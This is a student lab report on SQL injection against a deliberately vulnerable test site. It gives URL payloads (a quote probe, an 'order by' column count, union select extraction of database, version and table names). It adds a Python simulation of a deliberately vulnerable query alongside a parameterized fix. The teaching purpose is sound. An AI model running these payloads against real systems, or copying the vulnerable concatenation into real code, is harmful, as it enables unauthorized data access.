WMS Exp3

web and mobile security

Uploaded by Sarthak Puri

Experiment 3

Student Name: Sarthak Puri UID: 20BCS7233


Branch: CSE Section/Group: 705/A
Semester: 5th

Aim- Design a method to simulate the SQL injection

Objective- To test SQL injection.

Software/Hardware Requirements-
• Windows 7 and above versions.

Introduction-

What is SQL injection (SQLi)?

• SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with
the queries that an application makes to its database.
• It generally allows an attacker to view data that they are not normally able to retrieve.
• In many cases, an attacker can modify or delete this data, causing persistent changes to the
application's content or behaviour.

What is the impact of a successful SQL injection attack?

- A successful SQL injection attack can result in unauthorized access to sensitive data, such as
passwords, credit card details, or personal user information.
- Many high-profile data breaches in recent years have been the result of SQL injection attacks,
leading to reputational damage and regulatory fines.
OUTPUTS-
Steps/Method/Coding:

• Open the target URL given below in the browser.

• Open the link- http://testphp.vulnweb.com/
• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
• Inject the malicious code (cheat code) by appending a quote to the parameter-
http://testphp.vulnweb.com/listproducts.php?cat=-1’
• Put a random number in an order by clause (cheat code)-
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11
to check the number of columns the query returns.
• Information gathering-
• To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database( )—
• To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
• Information to be fetched-
• Table names- cat=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name)
from information_schema.tables where table_schema=database()—
- Open the above link

• Different cheat codes


• Trying to find the number of columns by putting a number in the link
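The steps above, re-created as an added Python simulation that is not part of the original report and not the test site's code. It assumes an in-memory SQLite database with a constructed products table and a constructed users table (so `database()` and `version()` from the MySQL steps are not available), and the function names are hypothetical. The vulnerable handler splices `cat` into the query exactly as the listproducts.php page does; the quote probe, the order by column-count probe and the union extraction all work against it, while the parameterized handler and the integer check return nothing for the same input.

```python
import sqlite3

# Constructed sample data standing in for the test site's tables (not real data).
PRODUCTS = [(1, 1, "lamp"), (2, 1, "chair"), (3, 2, "desk")]
USERS = [("admin", "constructed-secret")]


def build_db():
    """Create an in-memory SQLite database with a products table and a second
    table holding data the products page was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (uname TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def list_products_vulnerable(conn, cat):
    """The broken pattern: the raw query-string value is concatenated into SQL,
    so whatever follows the number is parsed as SQL, not treated as data."""
    sql = "SELECT id, cat, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_safe(conn, cat):
    """The fix: the value is bound as a parameter, so it can only ever be
    compared against the cat column, never executed."""
    sql = "SELECT id, cat, name FROM products WHERE cat=?"
    return conn.execute(sql, (cat,)).fetchall()


def parse_cat(cat):
    """Defence in depth: the page only needs an integer, so reject anything
    else before it reaches the database (raises ValueError otherwise)."""
    return int(cat)


def triggers_sql_error(conn, value):
    """True when the raw value breaks the vulnerable query's syntax: the signal
    the report's cat=-1' step looks for (a database error instead of a page)."""
    try:
        list_products_vulnerable(conn, value)
        return False
    except sqlite3.OperationalError:
        return True


def probe_column_count(conn, n):
    """The report's 'order by N' step: True while the database accepts ORDER BY n,
    False once n exceeds the number of columns in the query."""
    return not triggers_sql_error(conn, f"-1 ORDER BY {n}")


def find_column_count(conn, limit=20):
    """Increase n until ORDER BY fails; the last accepted n is the column count."""
    count = 0
    for n in range(1, limit + 1):
        if not probe_column_count(conn, n):
            break
        count = n
    return count


# Union payload in the shape the report uses (cat=-1 union select ...), padded to
# the three columns of the original query instead of the site's ten.
UNION_PAYLOAD = "-1 UNION SELECT 1, 2, uname || ':' || passwd FROM users"


if __name__ == "__main__":
    db = build_db()
    print("normal request:", list_products_vulnerable(db, "1"))
    print("quote probe breaks query:", triggers_sql_error(db, "-1'"))
    print("column count:", find_column_count(db))
    print("vulnerable + union:", list_products_vulnerable(db, UNION_PAYLOAD))
    print("parameterized + union:", list_products_safe(db, UNION_PAYLOAD))
    try:
        parse_cat(UNION_PAYLOAD)
    except ValueError:
        print("integer check: rejected before reaching the database")
```

The parameterized query is the fix that matters: the same payload that returns the users table through string concatenation is simply compared against the cat column and matches nothing, and the integer check rejects it before any query is built.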
Learning Outcomes-
• How to do SQL injection
• What different functions we can perform on the SQL database
